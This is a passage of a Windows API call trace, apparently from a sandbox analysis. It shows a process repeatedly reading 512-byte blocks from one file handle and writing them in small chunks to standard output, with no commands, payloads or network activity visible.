(hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.804] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.804] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.811] GetFileType (hFile=0x50) returned 0x1 [0194.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.819] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.821] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.821] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.822] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.824] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.824] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.825] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.829] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.829] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.831] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.831] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.832] GetFileType (hFile=0x50) returned 0x1 [0194.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.832] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, 